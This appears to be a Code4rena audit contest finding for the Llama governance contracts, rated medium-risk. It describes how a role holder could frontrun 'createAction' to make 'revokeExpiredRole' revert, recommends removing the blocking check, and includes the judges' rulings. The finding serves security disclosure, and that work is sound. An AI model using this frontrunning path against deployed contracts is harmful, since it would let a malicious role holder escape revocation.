Platform: Code4rena
Start Date: 06/06/2023
Pot Size: $60,500 USDC
Total HM: 5
Participants: 50
Period: 8 days
Judge: gzeon
Id: 246
League: ETH
Rank: 14/50
Findings: 1
Award: $446.81
🌟 Selected for report: 0
🚀 Solo Findings: 0
446.8103 USDC - $446.81
Malicious user can frontrun "createAction" to make "revokeExpiredRole" revert due to the "_assertNoActionCreationsAtCurrentTimestamp" check. So it is impossible to revoke a malicious role holder's role.
function _assertNoActionCreationsAtCurrentTimestamp() internal view { if (llamaExecutor == address(0)) return; // Skip check during initialization. address llamaCore = LlamaExecutor(llamaExecutor).LLAMA_CORE(); uint256 lastActionCreation = LlamaCore(llamaCore).getLastActionTimestamp(); if (lastActionCreation == block.timestamp) revert ActionCreationAtSameTimestamp(); }
If anyone is calling "revokeExpiredRole" to revoke an expired role and the role holder has action creation permission, the holder could frontrun the "createAction" function to make the "revokeExpiredRole" call revert because the lastActionCreation would then be equal to block.timestamp.
Manual Review
Delete "_assertNoActionCreationsAtCurrentTimestamp"
DoS
#0 - c4-pre-sort
2023-06-19T11:45:47Z
0xSorryNotSorry marked the issue as duplicate of #209
#1 - c4-judge
2023-07-02T11:13:15Z
gzeon-c4 changed the severity to 2 (Med Risk)
#2 - c4-judge
2023-07-02T11:13:42Z
gzeon-c4 marked the issue as satisfactory